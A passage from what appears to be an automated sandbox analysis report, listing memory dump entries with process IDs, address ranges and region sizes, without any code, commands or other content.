                                                                                                                                                                                • memory/4400-266-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4400-317-0x00000000034C0000-0x00000000034EE000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  184KB

                                                                                                                                                                                • memory/4476-307-0x0000000005730000-0x0000000005731000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4476-265-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4476-281-0x0000000000B40000-0x0000000000B41000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4476-292-0x00000000054C0000-0x00000000054C1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4476-303-0x0000000005440000-0x0000000005442000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                • memory/4520-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4520-318-0x0000000002C00000-0x0000000002CD1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  836KB

                                                                                                                                                                                • memory/4520-316-0x00000000005F0000-0x000000000065F000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  444KB

                                                                                                                                                                                • memory/4532-394-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4532-403-0x0000000001250000-0x000000000126E000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  120KB

                                                                                                                                                                                • memory/4532-404-0x0000000001140000-0x0000000001141000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4532-402-0x0000000001130000-0x0000000001131000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4532-397-0x0000000000C10000-0x0000000000C11000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4572-300-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4596-380-0x0000000007FA0000-0x0000000007FA1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4596-329-0x0000000002C90000-0x0000000002DDA000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.3MB

                                                                                                                                                                                • memory/4596-248-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4596-355-0x0000000004C60000-0x0000000004C7A000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  104KB

                                                                                                                                                                                • memory/4596-346-0x0000000004990000-0x00000000049AB000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  108KB

                                                                                                                                                                                • memory/4596-344-0x0000000000400000-0x0000000002C83000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40.5MB

                                                                                                                                                                                • memory/4596-363-0x0000000004E20000-0x0000000004E21000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4596-365-0x0000000004E40000-0x0000000004E41000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4596-360-0x00000000078A0000-0x00000000078A1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4608-272-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4616-350-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  120KB

                                                                                                                                                                                • memory/4616-351-0x0000000000418E3E-mapping.dmp
                                                                                                                                                                                • memory/4656-388-0x0000000007A90000-0x0000000007A91000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4656-386-0x0000000007D10000-0x0000000007D11000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4656-383-0x00000000079E0000-0x00000000079E1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4656-382-0x0000000007AB0000-0x0000000007AB1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4656-379-0x00000000072C0000-0x00000000072C1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4656-338-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4656-362-0x0000000007330000-0x0000000007331000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4656-359-0x0000000006BB0000-0x0000000006BB1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4664-328-0x00000000001C0000-0x00000000001CA000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                • memory/4664-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4664-387-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4672-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4672-330-0x0000000004760000-0x000000000478F000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  188KB

                                                                                                                                                                                • memory/4672-370-0x0000000007E00000-0x0000000007E01000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4684-255-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4736-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4832-246-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4832-333-0x0000000002DA0000-0x0000000002EEA000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.3MB

                                                                                                                                                                                • memory/4868-393-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4908-279-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4908-288-0x0000000004FC0000-0x0000000004FC1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4908-287-0x0000000005420000-0x0000000005421000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4908-283-0x00000000005F0000-0x00000000005F1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4908-293-0x0000000004F50000-0x0000000004F51000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4908-294-0x0000000004EC0000-0x0000000004EC1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4940-273-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5020-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5020-327-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-339-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-336-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-322-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-323-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-337-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-324-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-321-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-309-0x0000000003930000-0x000000000396C000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  240KB

                                                                                                                                                                                • memory/5020-343-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-311-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-312-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-326-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-320-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-314-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-315-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-342-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-319-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5020-335-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5068-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5248-405-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5352-413-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5532-416-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5532-425-0x0000000000FC0000-0x0000000000FC1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5532-419-0x0000000000970000-0x0000000000971000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5568-423-0x0000000000FE0000-0x0000000000FE1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5568-417-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5624-521-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5628-420-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5924-433-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5968-434-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5980-435-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/6000-496-0x0000000000000000-mapping.dmp